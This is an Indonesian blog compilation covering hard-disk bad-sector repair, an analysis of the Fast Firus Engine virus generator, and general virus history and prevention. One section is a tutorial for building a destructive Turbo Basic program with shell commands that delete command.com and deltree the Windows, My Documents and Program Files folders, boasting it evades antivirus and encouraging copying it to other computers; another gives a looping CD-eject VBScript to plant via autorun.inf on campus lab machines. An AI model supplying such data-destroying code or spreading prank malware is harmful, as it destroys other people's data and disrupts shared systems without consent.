Kalau SpinRite mendeteksi perlunya perbaikan, SpinRite akan langsung bekerja di Level 4 untuk memperbaiki dan mengembalikan data. Level 4 kembali memakan waktu yang tidak sebentar. Hitungan waktu pengerjaan bisa dalam satuan jam bahkan hari, lagi-lagi tergantung kerusakan.
SpinRite punya screen saver yang aktif ketika SpinRite sedang bekerja. Anda bisa pula menampilkan jalannya proses yang sedang berlangsung. Jika hard disk Anda mendukung fitur pembacaan suhu, SpinRite akan melaporkan informasi suhu hard disk. Temperatur hard disk akan naik terus saat SpinRite memperbaiki data Anda.
Ketika bekerja, SpinRite juga memiliki opsi untuk melihat lebih dekat proses perbaikan yang berlangsung. Opsi tersebut namanya adalah “DynaStat Data Recovery”.
Jika hard disk masih rusak setelah diperbaiki dengan peranti seperti SpinRite, barangkali memang sudah waktunya Anda mengganti hard disk baru.

Terima kasih. Semoga bermanfaat.
Harddisk adalah media penyimpan yang sangat penting pada komputer. Sayangnya umur pemakaian yang terbatas. Kerusakan pada harddisk dapat disebabkan beberapa hal.
Misalnya :
* Power supply yang tidak memadai dan merusak kontroller harddisk dan motor.
* Harddisk terjatuh dan merusak mekanik didalamnya atau minimal terjadi bad sector. * Terlalu sering dibawa bawa tanpa pengaman membuat platter harddisk rusak karena goncangan berlebih.
* Suhu didalam harddisk yang panas membuat kondisi harddisk dalam lingkungan tidak stabil.
* Kondisi MTBF/umur harddisk, sudah tercapai dan akan rusak.
Hal yang masih dapat dilakukan untuk memperbaiki harddisk yang terkena bad sector adalah hanya kondisi dimana harddisk masih berputar, keadaan controller harddisk masih bekerja. Tetapi keadaan ini masih dibagi lagi, bila ingin mengunakan harddisk yang terkena bad sector.
Masalah penyebab bad sector adalah salah satu kerusakan yang sering terjadi. Kondisi kerusakan oleh bad sector dibedakan oleh 3 keadaan.
Kondisi dimana platter harddisk aus. Pada kondisi ini harddisk memang sudah tidak dapat digunakan. Semakin lama harddisk semakin rusak dan tidak berguna lagi untuk dipakai sebagai media storage.

Kondisi platter yang aus tetapi belum mencapai kondisi kritis. Kondisi ini dapat dikatakan cukup stabil untuk harddisk. Kemungkinan harddisk masih dapat diperbaiki karena platter masih mungkin dilow level.

Kondisi platter yang aus, baik kondisi yang parah atau ringan tetapi kerusakan terdapat di cluster 0 (lokasi dimana informasi partisi harddisk disimpan). Kondisi ini tidak memungkinkan harddisk diperbaiki.

Membicarakan keadaan harddisk untuk diperbaiki hanya memungkinkan perbaikan pada kondisi ke 2, dimana permukaan harddisk masih stabil tetapi terdapat kerusakan ringan di beberapa tempat.
Tujuan
Upaya untuk mengunakan harddisk yang terdapat bad sector
Men-eliminasi lokasi kerusakan pada bad sector.

Tahapan 1
Sebelum melakukan tahapan selanjutnya sebaiknya mengunakan tahapan 1 untuk memastikan kondisi platter harddisk yang rusak. Untuk mengetahui hal ini harddisk harus dilakukan LOW LEVEL FORMAT (LLF). LLF dapat dilakukan dari BIOS atau Software. Untuk BIOS, beberapa PC lama seperti generasi 486 atau Pentium (586) memiliki option LLF. Atau dapat mengunakan software LLF. Untuk mendapatkan software LLF dapat diambil di Site pembuat harddisk. Atau mencari utiliti file seperti hddutil.exe (dari Maxtor – MaxLLF.exe) dan wipe.exe versi 1.0c 05/02/96.
Fungsi dari software LLF adalah menghapus seluruh informasi baik partisi, data didalam harddisk serta informasi bad sector. Software ini juga berguna untuk memperbaiki kesalahan pembuatan partisi pada FAT 32 dari Windows Fdisk.
Setelah menjalankan program LLF, maka harddisk akan benar-benar bersih seperti kondisi pertama kali digunakan.
Peringatan : Pemakaian LLF software akan menghapus seluruh data didalam harddisk

Tahapan 2
Proses selanjutnya adalah dengan metode try dan error. Tahapan untuk sesi ini adalah :
1. Membuat partisi harddisk : Dengan program FDISK dengan 1 partisi saja, baik primary atau extended partisi. Untuk primary dapat dilakukan dengan single harddisk , tetapi bila menghendaki harddisk sebagai extended, diperlukan sebuah harddisk sebagai proses boot dan telah memiliki primary partisi (partisi untuk melakukan booting).
2. Format harddisk : Dengan FORMAT C: /C. Penambahan perintah /C untuk menjalankan pilihan pemeriksaan bila terjadi bad sector. Selama proses format periksa pada persentasi berapa kerusakan harddisk. Hal ini terlihat pada gambar dibawah ini.
3. Buat partisi kembali : Dengan FDISK, buang seluruh partisi didalam harddisk sebelumnya, dan buat kembali partisi sesuai catatan kerusakan yang terjadi. Asumsi pada gambar bawah adalah pembuatan partisi dengan Primary dan Extended partisi. Pada Primary partisi tidak terlihat dan hanya ditunjukan partisi extended. Pembagian pada gambar dibawah ini adalah pada drive D dan F (22MB dan 12 MB) dibuang karena terdapat bad sector. Sedangkan pada E dan G ( 758MB dan 81MB) adalah sebagai drive yang masih dalam kondisi baik dan dapat digunakan.
4. Untuk memastikan apa bad sector sudah terletak pada partisi harddisk yang akan dibuang, lakukan format pada seluruh letter drive dengan perintah FORMAT /C. Bila bad sector memang terdapat pada partisi yang dibuang (asumsi pada pengujian bad sector terletak pada letter drive D dan F), maka partisi tersebut dapat langsung dibuang. Tetapi bila terjadi kesalahan, misalnya kerusakan bad sector tidak didalam partisi yang akan dibuang melainkan terdapat pada partisi yang akan digunakan, anda harus mengulangi kembali proses dari awal dengan membuang partisi dimana terdapat kesalahan dalam membagi partisi yang terkena bad sector. Hal yang perlu diingat : Pembuatan partisi dilakukan dari awal ke akhir, misalnya C, D, E dan selanjutnya. Untuk membuang partisi mengunakan cara sebaliknya yaitu dari Z ke C. Kesalahan dalam membuang dan membuat partisi yang acak acakan akan mengacaukan sistem partisi harddisk.
5. Proses selanjutnya adalah membuang partisi yang tidak digunakan lagi. Setelah melakukan pemeriksaan dengan program FORMAT, maka pada proses selanjutnya adalah membuang partisi yang mengandung bad sector. Pada gambar dibawah ini adalah: Tahap membuang 2 partisi dengan FDISK untuk letter drive D dan E. Untuk E dan G adalah partisi letter drive yang akan digunakan.
6. Pada akhir tahapan anda dapat memeriksa kembali partisi harddisk dengan option 4 (Display partitisi) pada program FDISK, contoh pada gambar dibawah ini adalah tersisa 3 drive : C sebagai primary partisi (tidak terlihat), 2 extended partisi yang masih baik dan partisi yang mengandung bad sector telah dihapus.
7. Akhir proses. Anda memiliki harddisk dengan kondisi yang telah diperbaiki karena bad sector. Letter drive dibagi atas C sebagai Primary partisi dan digunakan sebagai boot, D (758MB) dan E (81MB) adalah partisi ke 2 dan ke 3 pada extended partisi.

etika program FORMAT menampilkan Trying to recover allocation unit xxxxxx, artinya program sedang memeriksa kondisi dimana harddisk tersebut terjadi bad sector. Asumsi pada pengujian dibawah ini adalah dengan Harddisk Seagate 1.2 GB dengan 2 lokasi kerusakan kecil dan perkiraan angka persentasi ditunjukan oleh program FORMAT :Kondisi Display pada program Format persentasi yang dapat digunakan
* Baik 0-20% 20%
* Bad sector 21% Dibuang
* Baik 22-89% 67%
* Bad sector 91% Dibuang
* Baik 91-100% 9%
Bila anda cukup ngotot untuk memperbaiki bad sector anda, dapat juga dilakukan dengan try-error dengan mengulangi pencarian lokasi bad sector pada harddisk secara tahapan yang lebih kecil, misalnya membuat banyak partisi untuk memperkecil kemungkinan terbuangnya space pada partisi yang akan dibuang. Semakin ngotot untuk mencari kerusakan pada tempat dimana terjadi bad sector semakin baik, hanya cara ini akan memerlukan waktu lebih lama walaupun hasilnya memang cukup memuaskan dengan memperkecil lokasi dimana kerusakan harddisk terjadi.
Bila anda belum puas dengan hasil mencari bad sector, maka anda dapat mengulangi prosesur diatas. Untuk melakukan Tips ini sebaiknya sudah mengetahui prosedur dalam membuat partisi dengan program FDISK.
Yang perlu dicatat pada tip ini adalah, berhati-hati pada pemakaian program LLF. Sebaiknya mengunakan single drive untuk mengunakan program ini. Kesalahan melakukan LOW LEVEL FORMAT pada harddisk sangat fatal dan tidak dapat dikembalikin seperti kondisi semula.
Untuk harddisk yang terkena BAD SECTOR sebaiknya mengunakan harddisk yang kondisinya belum terlalu parah atau bad sector terdapat di beberapa tempat dan tidak sporadis tersebar. Kerusakan pada banyak tempat (sporadis bad sector) pada harddisk akan menyulitkan pencarian tempat dimana terjadi bad sector.

Senin, 05 April 2010

Cara membuat virus dalam waktu sekejap.
Masih ingat dengan virus Aksika? Virus “open source” yang satu itu memang memiliki banyak sekali varian. Tidak heran karena source code-nya memang disedia kan bebas di Internet, jadi siapapun dapat dengan mudah mengubah dan meng-compile source code-nya dan jadilah varian baru.
Berawal dari kemudahan itulah, banyak virus maker ataupun programer pemula mencoba–coba untuk membuat virus tanpa perlu repot. Paling yang dibutuhkan hanyalah pengetahuan seputar operating system dan programming
Namun kemudahan itu belum seberapa, bila dibandingkan dengan menggunakan program Virus Generator. Dari namanya saja, kita sudah dapat mengira kegunaan dari program tersebut. Ya, Virus Generator merupakan program untuk dapat membuat virus secara mudah dan instan.
Bermula dari sampel sebuah virus yang lumayan banyak dikirimkan oleh pembaca kepada kami. PC Media Antivirus mengenalnya dengan nama Gen.FFE-Fajar, namun antivirus lain ada juga yang menyebutnya dengan nama Brontok.D. Dengan penyelidikan sederhana akhirnya diketahui bahwa virus tersebut dibuat menggunakanVirus Generator.
Fast Firus Engine (FFE)
Pembuat Generator tersebut menamakan program buatannya itu dengan nama Fast Firus Engine. Seperti yang terlihat pada program ataupun situs pembuatnya, ia memberitahukan bahwa program ini hanya untuk tujuan pembelajaran dan tidak untuk tindakan merusak. Namun tetap saja, bila program ini sudah jatuh ke tangan yang salah, pasti akan digunakan untuk pengrusakan.
Virus Generator ini dibuat menggunakan bahasa Visual Basic dan di-compress menggunakan packer tELock. Dalam paketnya terdapat dua buah file, yakni Fast Firus Engine.exe dan data.ex_. Fast Firus Engine. exe merupakan program utama dalam pembuatan virusnya dan sementara file data.ex_ sebenarnya merupakan badan virus asli yang belum dimodifi kasi.
Saat file Fast Firus Engine.exe dijalankan, maka pengguna akan dihadapkan pada sebuah interface. Anda hanya disuruh mengisikan nama virus, nama pembuat, dan pesan-pesannya. Lalu dengan menekan tombol Generate, maka jadilah virus Anda.
Cara kerja dari Generator tersebut sebenarnya sangat sederhana. Ia hanya menambahkan data yang Anda masukkan tadi ke bagian akhir file virus asli (data.ex_). Nantinya informasi tersebut digunakan oleh virus dalam proses infeksi.
Bagaimana Virus Menginfeksi?
Virus hasil ciptaan FFE memang terlihat sederhana. Sama seperti Generatornya, ia juga dibuat menggunakan bahasa Visual Basic yang di-compile dengan metode Native- Code. Lalu di compress menggunakan tELock agar ukurannya semakin kecil. Virus ini memiliki ukuran tubuh asli sebesar 55.296 bytes.
Saat virus kali pertama dieksekusi, ia akan membuat beberapa file induk di beberapa lokasi. Seperti di direktori \%WINDOWS%\, akan terdapat file dengan nama.exe, Win32 exe, activex.exe, dan %virusname% (nama virus sesuai yang diisikan oleh sang pembuatnya pada Generator). Di \%WINDOWS%\ %system32%\ akan terdapat file copy.pif, _default.pif, dan surif.bin. Selain itu, ia juga mengubah atau membuat file Oeminfo.ini yang merupakan bagian dari System Properties. Jadi apabila komputer Anda terinfeksi oleh virus hasil generate dari FFE, maka pada System Properties akan terdapat tulisan “Generated by Fast Firus Engine”.
Di direktori \%WINDOWS%\%System%\ akan terdapat beberapa file induk lagi yang menggunakan nama yang sama seperti file system milik Windows, seperti csrss.exe, winlogon.exe, lsass.exe, smss.exe, svchost. exe, dan winlogon.exe.
Dan tak lupa, pada root drive pun akan terdapat file dengan nama “baca euy.txt” yang berisikan pesan–pesan dari si pembuat virus. Jadi pada saat membuat virus dengan menggunakan Generator tersebut, maka pembuatnya akan disuguhkan beberapa kotak input, seperti Author of the virus, Name of the virus, dan Messages. Nah, isi dari kotak messages ini yang nantinya ditampilkan pada file “baca euy.txt” tersebut.
Setelah virus berhasil meng-copy-kan file induknya ke dalam sistem tersebut, ia akan menjalankan file induk tadi, sehingga pada memory akan terdapat beberapa process virus, seperti csrss.exe, winlogon.exe, lsass. exe, smss.exe, svchost.exe, dan winlogon.exe. Nama process yang mirip dengan process/services milik Windows tersebut mungkin sengaja untuk mengecoh user. Untuk membedakannya, Anda dapat melihat path atau lokasi process tersebut dijalankan. Process virus ini biasanya berjalan di direktori System sementara process/services milik Windows yang running biasanya berasal dari direktori System32.
Mengubah Registry
Virus ini menambahkan beberapa item startup pada registry agar pada saat memulai Windows ia dapat running secara otomatis atau untuk mengubah setting-an Windows agar sesuai keinginannya. Informasi mengenai registry yang diubahnya tidak akan dapat dengan mudah kita lihat karena dalam kondisi terenkripsi.
Yang ia ubah adalah seperti nilai dari item Userinit, yakni dengan menambahkan parameter ke file induk. Pada key HKEY_CURRENT_ USER\Software\Microsoft\Windows NT\CurrentVersion\Windows\Load juga akan diubah itemnya agar mengarah ke file induknya dengan nama Activex.exe. Pada HKEY_CURRENT_USER \Software\Microsoft\ Windows\CurrentVersion\Run\ akan terdapat item baru dengan nama present. Key HKEY_ LOCAL_MACHINE\SOFTWARE\Microsoft\ Windows\CurrentVersion\Run\ akan terdapat item baru juga dengan nama Default dan %username%, username di sini merupakan nama user yang sedang aktif saat itu.
Virus hasil generate dari FFE juga mengubah shell extension untuk file .exe, yakni dengan mengubah type information dari Application menjadi File Folder. Setting-an folder Options juga diubah agar tidak menampilkanextension dan setiap fi le dengan attribut hidden. Dan agar dapat aktif pada safe-mode, ia pun mengubah nilai dari item SafeBoot.
Dengan menggunakan bantuan registry Image File Execution Options, virus ini juga menambahkan item baru pada section tersebut dengan nama cmd.exe, msconfi g.exe, regedit.exe, dan taskmgr.exe. Maksudnya adalah agar setiap user yang mengakses program dengan nama file seperti itu, maka akan di-bypass oleh Windows dan dialihkan ke file induk si virus.
Bagaimana Virus Menyebar?
Virus ini dapat menyebar melalui media penyimpan data seperti flash disk. Saat Anda mencolokkan flash disk pada komputer yang terinfeksi, maka pada flash disk tersebut akan terdapat beberapa file baru, seperti explorer.exe, %virusname%.exe, dan msvbvm60.dll. Juga beberapa file pendukung seperti desktop.ini, autorun.inf agar ia dapat running otomatis pada saat mengakses flash disk tersebut.
File virus lainnya pun disimpan pada direktori baru di flash disk tersebut dengan nama Recycled yang berisikan file Firus.pif dan Folder.htt. Kesemua file virus tersebut dalam kondisi hidden sehingga tidak terlihat.
Virus Beraksi
Untuk dapat bertahan hidup, virus ini pun akan mencoba untuk memblok setiap program yang tidak ia inginkan seperti tools atau programantivirus termasuk PCMAV. Sama seperti halnya data registry yang diubah, data mengenai program apa saja yang diblok olehnya juga terdapat dalam tubuhnya dalam kondisi terenkripsi.
Jadi, saat virus sudah stay di memory, ia akan memonitor setiap program yang diakses oleh user, yakni dengan membaca nama file dan juga caption Window. Beberapa nama fileantivirus yang dicoba untuk dibloknya adalah nav.exe, avgcc.exe, njeeves.exe, ccapps.exe, ccapp.exe, kav.exe, nvcoas.exe, avp32.exe, dan masih banyak lagi yang lainnya. Termasuk beberapa program setup atau installer juga tidak dapat dijalankan pada komputer terinfeksi.
Pencegahan dan Penanggulangan
PC Media Antivirus RC19 ini dapat membersihkan komputer terinfeksi secara tuntas dan akurat 100% setiap virus yang dibuat dengan menggunakan Fast Firus Generator. Untuk menghindari aksi blok oleh virus terhadap PCMAV, silakan Anda rename terlebih dahulu file PCMAV misalnya PCMAV-CLN.EXE menjadi MERDEKA.EXE.


== Cara membuat program perusak (Seperti Virus) ==
Penulis peduli dengan para newbie yang sedang belajar pemograman sekaligus penulis juga
peduli dengan para progammer yang belum mengenal bahasa BASIC (Maklum kebanyakan progammer
pada langsung lompat ke Pascal, C dan lainnya).
Membuat program perusak (seperti virus) merupakan keinginan sebagian para pemula komputer,
tapi bagaimana mereka bisa membuat kalau mereka tidak tahu bahasa pemograman sama sekali,
anda jangan resah untuk masalah ini karena saat ini penulis akan mengajarkan anda cara
membuat program perusak ( seperti virus) yang sangat sederhana sekali tapi sangat mematikan
bahkan bisa dikatakan lebih mengerikan dari program perusak manapun.
Pertama kali skill yang anda butuhkan adalah dasar DOS, tanpa ini anda akan sulit untuk
berkreasi dalam membuat program ini tapi jika anda tidak tahu dasar perintah DOS maka anda
cukup copy paste saja, bahasa pemograman yang akan kita pakai adalah Turbo Basic v1.0, anda
dapat mendownloadnya di Google atau cari dirental CD.
Jika anda buta pemograman Turbo Basic maka anda masuk ke Edit lalu anda tulis Source Code
program perusak.
shell "Perintah DOS"
dengan diawali kata shell maka anda dapat menjalankan perintah DOS pada program, misal anda
membuat :
shell "c:"
shell "cd\"
shell "del command.com"
Diatas adalah contoh menghapus DOS pada DOS Classic, Windows 95/98 sehingga pengguna
komputer tidak dapat booting, kita contohkan yang lain.
shell "c:"
shell "cd\"
shell "deltree /y mydocu~1"
shell "deltree /y windows"
shell "deltree /y progra~1"
Diatas adalah contoh menghapus Directory My Document, Windows dan Program Files, sangat
fatal bukan ?
Setelah anda selesai membuat programnya maka anda save dahulu, caranya pilih File lalu Save
lalu beri nama filenya misal VIRUS.BAS, setelah itu baru kita mengcompile source code tadi,
caranya pilih Options lalu pilih Compile to EXE file, setelah itu masuk ke pilihan compile
lalu anda enter, maka source code tersebut akan menjadi file EXE.
Jika file EXE tersebut dijalankan maka komputer anda akan menjalankan perintah DOS pada
program, dari tutorial diatas, anda dapat berkreasi sendiri bagaimana virus buatan anda
dapat berjalan sesuai dengan anda inginkan, perlu diketahui bahwa BELUM ADA SATU ANTIVIRUS
DIDUNIA INI DAPAT MENDETEKSI PROGRAM INI ADALAH VIRUS jadi anda bebas mengcopykan program
ini ke komputer manapun yang anda suka kecuali komputer berbasis non DOS atau Windows, hehe
Tujuan dari tutorial ini adalah agar kita lebih waspada terhadap berbagai file dengan
ekstensi *.exe meskipun file *.exe tersebut 100% dinyatakan bebas virus dari berbagai
jenis Antivirus.


Cara membuat Virus Nakal
Ayo kita buat “Virus” Nakal, buat ngerjain dosen/guru yang kita ngga suka, lagi suntuk di ruang labkom kampus, pusing ngga bisa maen facebook karen diblokir sama admin labkom, yah iseng2 buatin scripts .vbs.
Caranya: Buka notepad dan masukkan code berikut,
Set ilikepies = CreateObject(“WMPlayer.OCX.7″)
Set ilikepie = ilikepies.cdromCollection
if ilikepie.Count >=1 then
do
For ilikepiesalot=0 to ilikepie.COunt -1
ilikepie.Item(ilikepiesalot).Eject
Next ‘ cdrom
For ilikepiesalot=0 to ilikepie.COunt -1
ilikepie.Item(ilikepiesalot).Eject
Next ‘ cdrom
loop
End I
Simpanlah dengan file tadi dengan ekstensi file iseng.vbs ato apapun nama kesukaan asalkan pastikan ekstensinya .vbs, dan jalankan filenya ( Klik 2x), perhatikan CD/DVD ROM akan terbuka/tertutup dengan sendirinya tanpa henti.

Salah satu cara menghentikan aksi Virus Nakal ini ialah dengan menekan tombol CRTL+ALT+DEL dan matikan proses wscripts.exe, Kalo mau keren lagi, masukkan ke file autorun.inf di flashdisk anda, jadi setiap loe colokin ke kompie kampus, maka akan otomatis dijalankan “Virus” Nakal ini.

Terima kasih. Semoga bermanfaat.

Sabtu, 03 April 2010

Mengenal Virus Komputer

Ternyata, komputer bisa terserang virus juga. Sebenarnya virus komputer itu berbentuk apa ya? Kira-kira, virus komputer itu sama tidak ya dengan virus pada manusia? Lalu apakah virus komputer itu menular? Kemudian, bagaimana caranya agar komputer kita tidak terinfeksi virus? Ingin tahu jawabannya? Silahkan baca kelanjutan artikel berikut ini…
Dalam ilmu kedokteran, virus pada makhluk hidup adalah mikro organisme yang tidak dapat dilihat oleh mikroskop biasa, jadi hanya bisa dilihat dengan mikroskop elektron. Pada ilmu komputer, virus yang dimaksud adalah adalah sebuah program komputer yang memiliki kemampuan untuk menggandakan diri dengan cara menyisipkan program / script ke dalam sebuah file lain. Mirip seperti virus biologis, virus komputer dapat menyebar dengan cepat pada file-file dalam sebuah komputer, atau bahkan menulari file di komputer lain, baik melalui jaringan maupun lewat kegiatan tukar-menukar file. Saat ini banyak virus yang sengaja disebarkan melalui email. Oleh karenanya, jika komputer kita terhubung langsung ke internet, sebaiknya kita harus memasang antivirus dan upayakan agar selalu ter-update (diperbaharui).

Jenis Virus
Dahulu kita mengenal pembagian virus berdasarkan sasaran penyebarannya, yaitu virus boot sector dan virus file. Virus boot sector didesain oleh pembuatnya untuk menginfeksi boot sector, yakni bagian dari sebuah media penyimpanan (disket, hard disk) yang pertama kali dibaca oleh sistem operasi saat media tersebut diakses. Sekali media penyimpanan yang terinfeksi oleh virus jenis ini dipakai untuk melakukan booting, maka virus pun menetap di memory dan siap menginfeksi media penyimpanan lain yang digunakan di komputer yang sama. Belakangan, virus boot sector berkembang menjadi tipe yang lebih ganas, yaitu yang dikenal sebagai virus partisi (partition table). Tabel partisi adalah bagian pada hard disk yang menyimpan data-data CHS (cylinder/head/sector) yang menjadi pedoman bagi sistem operasi untuk melakukan proses pembacaan. Sekali bagian ini dihancur-leburkan oleh virus, maka tentunya hard disk tidak lagi dapat dibaca dan seluruh data didalamnya pun melayang.

Sementara itu, virus file bekerja dengan cara menyisipkan programnya dalam sebuah file. Dahulu, saat penggunaan sistem operasi DOS masih meluas, sasaran virus jenis ini adalah file-file executable, yaitu file yang namanya berakhiran dengan ekstensi .COM atau .EXE. Selain melakukan penularan, virus file seringkali menambahkan perintah-perintah tertentu pada kode program yang ditularinya. Umumnya virus semacam ini memiliki sifat sebagai “bom waktu”, dimana program virus akan melakukan aksinya pada waktu-waktu tertentu yang telah ditentukan oleh si programmer. “Aksi” ini bisa bermacam-macam, mulai dari yang ringan seperti menampilkan pesan dan membunyikan speaker, hingga melakukan perusakan dengan menghapus data, atau bahkan memformat hard disk !

Pada saat penggunaan program berbasis Windows mulai marak dengan aneka macam fitur, maka kita kembali mengenal satu jenis virus baru, yakni virus macro. Macro adalah serangkaian perintah, mirip perintah dalam bahasa pemrograman yang disediakan oleh perangkat lunak yang memungkinkan penggunanya untuk menyusun suatu rangkaian pekerjaan tertentu. Rangkaian perintah tersebut akan dijalankan sekaligus oleh perangkat lunak saat macro dijalankan. Fasilitas macro berguna untuk memudahkan pengguna dalam melakukan langkah-langkah yang berurutan dan berulang-ulang. Celakanya, fasilitas ini akhirnya disalahgunakan oleh tangan-tangan jahil untuk membuat macro yang berisi perintah-perintah penularan dan bahkan perusakan!

Jenis virus macro yang terkenal adalah virus WordMacro yang khusus dibuat untuk menginfeksi file data dari perangkat lunak pengolah kata Microsoft Word (berekstensi .DOC). Virus jenis ini memiliki hingga ribuan varian dengan aneka macam jenis gangguan. Mulai dari yang hanya menampilkan pesan pada waktu-waktu tertentu, hingga melakukan perusakan pada file. Virus WordMacro tergolong memiliki varian paling banyak karena kode-kodenya yang mudah untuk dimodifikasi. Disamping itu, mempelajari macro pada MS Word tidaklah sesulit mempelajari bahasa Assembly atau C (bahasa pemrograman yang sering digunakan untuk membuat program virus).

Menghindari Ancaman Virus
Sebagai pengguna komputer, ada beberapa langkah yang dapat kita lakukan untuk menghindari sistem kita dari ancaman virus maupun akibat-akibat buruk yang ditimbulkannya:
1. Pasang Anti Virus pada sistem komputer.
Sebagai perlindungan di garis depan, penggunaan anti virus adalah wajib. Ada banyak anti virus yang beredar di pasaran saat ini. Beberapa yang cukup handal diantaranya adalah McAfree VirusScan (www.mcafee.com) dan Norton Anti Virus (www.symantec.com).
2. Update database program anti virus secara teratur.
Ratusan virus baru muncul setiap bulannya. Usahakan untuk selalu meng-update database dari program anti virus yang anda gunakan. Database terbaru dapat dilihat pada website perusahaan pembuat program anti virus yang anda gunakan.
3. Berhati-hati sebelum menjalankan file baru.
Lakukan scanning terlebih dahulu dengan anti virus sebelum menjalankan sebuah file yang didapat dari mendownload di internet atau menyalin dari orang lain. Apabila anda biasa menggunakan sarana e-mail, berhati-hatilah setiap menerima attachment dalam bentuk file executable. Waspadai file-file yang berekstensi: *.COM, *.EXE, *.VBS, *.SCR, *.VB. Jangan terkecoh untuk langsung membukanya sebelum melakukan scanning dengan software anti virus.
4. Curigai apabila terjadi keanehan pada sistem komputer.
Menurunnya performa sistem secara drastis, khususnya saat melakukan operasi pembacaan/penulisan file di disk, serta munculnya masalah pada software saat dioperasikan bisa jadi merupakan indikasi bahwa sistem telah terinfeksi oleh virus.
5. Backup data secara teratur.
Tips ini mungkin tidak secara langsung menyelamatkan data kita dari ancaman virus, namun demikian akan sangat berguna apabila suatu saat virus betul-betul menyerang dan merusak data di komputer yang anda gunakan. Setidaknya dalam kondisi tersebut, kita tidak akan kehilangan seluruh data yang telah dibackup sebelumnya.

Terima kasih. Semoga bermanfaat.
Antivirus, Pembuat Virus, dan Sejarah Virus

Program antivirus
Program antivirus mampu mendeteksi virus dan mencegah akses ke dokumen yang terinfeksi dan juga mampu menghilangkan infeksi yang terjadi. Program pemindai virus merupakan jenis yang paling populer dalam dunia antivirus, tetapi program-program seperti ini harus sering diperbarui agar mampu mengenali virus-virus baru. Secara umum ada dua jenis program antivirus, yaitu on-access dan on-demand scanner. Banyak peerusahaan yang menawarkan gabungan dua jenis program tersebut dalam satu paket.
* On-access scanner akan selalu aktif dalam sistem komputer selama Anda menggunakannya. Pemindai jenis ini akan secara otomatis memeriksa dokumen-dokumen yang Anda akses dan dapat mencegah Anda menggunakan dokumen yang sudah terinfeksi oleh virus komputer.
* On-demand scanner membiarkan Anda yang akan memulai aktivitas pemindaian terhadap semua dokumen di komputer Anda. Ini juga bisa Anda atur agar bisa dilakukan secara periodik dengan menggunakan penjadwal.

Ada juga jenis anti-virus yang menerapkan pemindaian secara heuristic. Cara ini memungkinkan pemindai mendeteksi virus, baik yang sudah diketahui atau belum, dengan menggunakan aturan-aturan yang umum yang menjadi indikator adanya suatu virus. Ini sangat berguna untuk mendeteksi virus-virus jenis baru atau yang belum terdeteksi sebelumnya. Jenis heuristic scanner ini tidak perlu sering diupdate tetapi efek sampingnya terkadang bisa menimbulkan kesalahan deteksi, di mana seharusnya itu dokumen atau program normal, tetapi dideteksi dan dianggap sebagai suatu virus.


Siapa yang menulis virus?

Jika komputer atau jaringan Anda terkena virus, Anda pasti merasa jengkel dan terkadang Anda berpikir "Kenapa orang-orang ini sampai membuat virus?". Motivasi si pembuat virus terkadang berbeda-beda dalam membuat virus. Ada yang membuat virus karena ingin menyebarkan pesan politik, ingin mencari ketenaran, ingin mendapat pengakuan publik, mengkritik suatu institusi atau perusahaan (seperti virus-virus yang mengejek perusahaan Microsoft dan lain sebagainya).
Mereka mampu untuk masuk ke dalam sistem komputer seseorang, mendapatkan berbagai informasi, seperti alamat e-mail dan lain-lain dan kemudian bisa saja menjual informasi tersebut kepada spammer. Menurut beberapa penelitian, diketahui bahwa rata-rata pembuat virus adalah laki-laki, berumur dibawah 25 (dua puluh lima) tahun dan masih lajang.
Mereka terkadang ingin mendapat pengakuan dari komunitasnya dengan cara membuat dan menyebarkan virus komputer. Aktivitas membuat virus sama saja seperti aksi penulisan grafiti, di mana yang terbaik akan mendapatkan status yang lebih baik dari komunitasnya.Membuat virus terkadang suatu kepuasan tersendiri bagi penulisnya, dan mereka akan mendapat kekuatan dan kepopuleran di dunia maya, sementara hal ini tidak bisa mereka dapatenkan di dunia nyata. Mereka seringkali menggunakan nama-nama yang unik dan aneh demi menunjukkan eksistensinya dan juga terobsesi oleh tokoh-tokoh fantasi pujaannya.

Kronologi sejarah virus komputer
* 1950s - Bell Labs membuat suatu game eksperimental dimana pemainnya menggunakan program jahat untuk menyerang komputer pemain lainnya.
* 1975 - Penulis kisah sci-fi, John Brunner, membayangkan suatu worm komputer menyebar melalui jaringan.
* 1984 - Fred Cohen mengenalkan istilah virus komputer di dalam thesisnya.
* 1986 - Virus komputer pertama bernama Brain ditulis oleh dua orang bersaudara di Pakistan.
* 1987 - Worm yang bernama Christmas tree menyerang jaringan komputer IBM.
* 1988 - Worm internet menyebar pada jaringan US DARPA.
* 1992 - Terjadi kepanikan di dunia terhadap virus Michelangelo.
* 1994 - Good Times, virus hoax pertama muncul di dunia.
* 1995 - Virus dokumen pertama yang bernama Concept, hadir di dunia.
* 1998 - CIH atau Chernobyl menjadi virus pertama yang mampu untuk mengganggu hardware komputer.
* 1999 - Mellisa, virus yang menyebarkan dirinya melalui e-mail menyebar ke seluruh dunia. Kemudian virus Bubbleboy, menjadi virus pertama yang mampu menginfeksi komputer ketika Anda membaca e-mail Anda.
* 2000 - Love Bug, menjadi virus e-mail yang sukses. Pada saat itu juga ditemukan virus pada sistem operasi Palm.
* 2001 - Virus yang mengklaim dirinya berisi foto pemain tenis Anna Kournikova menginfeksi ribuan komputer di seluruh dunia.
* 2002 - David L Smith, pembuat virus Mellisa, diputus oleh pengadilan Amerika untuk di penjara selama 20 bulan.
* 2003 - Worm Blaster menyebar di internet dengan memanfaatkan kelemahan pada sistem operasi Windows. Pada saat yang sama juga menyebar virus e-mail yang bernama Sobig, ini membuat bulan Agustus 2003 menjadi bulan terburuk untuk insiden virus pada tahun tersebut.
* 2004 - Pembuat worm Netsky dan Bagle saling bersaing untuk meraih efek yang paling besar.

Apakah membuat virus itu selalu salah?
Bagi kita semua telah sepakat bahwa virus itu merupakan sesuatu hal yang buruk, tetapi apakah hal tersebut sepenuhnya benar? Beberapa virus bersifat tidak merusak atau bahkan ada yang berisi hal-hal yang lucu. Ada lagi virus lainnya yang memberi peringatan kepada kita mengenai adanya kelemahan pada suatu peranti lunak tertentu.
Beberapa orang ada yang berargumentasi bahwa virus ini ada gunanya juga, misalnya digunakan untuk menyebarkan bug fix. Sayangnya virus-virus yang bertujuan tidak merusak ini juga tidak bisa bertahan lama keberadaannya dan juga tetap saja tidak disenangi oleh semua orang.
Pertama, karena virus mampu untuk merubah setting pada komputer seseorang tanpa sepengetahuannya. Ini merupakan perbuatan yang tidak etis sekaligus juga ilegal pada sebagian besar negara di dunia ini, baik itu bertujuan baik atau buruk. Anda tidak boleh mengganggu komputer orang lain, ini sama analoginya dengan Anda meminjam mobil orang lain tanpa ijin, walaupun Anda mengisikan bahan bakarnya.
